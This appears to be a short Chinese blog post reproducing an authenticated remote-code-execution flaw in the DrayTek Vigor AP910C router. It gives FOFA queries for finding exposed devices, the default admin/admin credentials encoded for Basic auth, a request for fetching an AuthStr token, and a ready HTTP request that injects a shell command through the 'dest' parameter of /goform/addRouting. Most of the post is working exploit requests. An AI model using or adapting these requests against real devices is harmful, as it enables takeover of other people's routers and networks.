Babing
Published on 2024-08-30 / 1 Visits
0
0

D11-1DrayTek-VigorAP910C路由器-RCE

D11-1DrayTek-Vigor AP910C 路由器-RCE

漏洞描述:

DrayTek Vigor AP910C 存在后台 RCE 漏洞。攻击者可通过该漏洞在设备任意执行代码写入后门,获取设备权限,进而控制整个设备。

网站图片:

image-20240620204520256

网络测绘:

fofa语法:

header=“realm="VigorAP910C” || banner=“realm="VigorAP910C”

title=“Vigor 2960”

漏洞复现:

Basic认证 弱口令:YWRtaW46YWRtaW4=(admin/admin)登录
获取AuthStr值

GET /opmode.asp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Basic YWRtaW46YWRtaW4=
Referer: http://your-ip
Accept-Encoding: gzip


携带AuthStr命令执行

GET /goform/addRouting?AuthStr=o9RysaqGHLhiAnG&dest=||+echo+$(+ip+addr)%3b%23a HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Basic YWRtaW46YWRtaW4=
Referer: http://your-ip
Accept-Encoding: gzip


Comment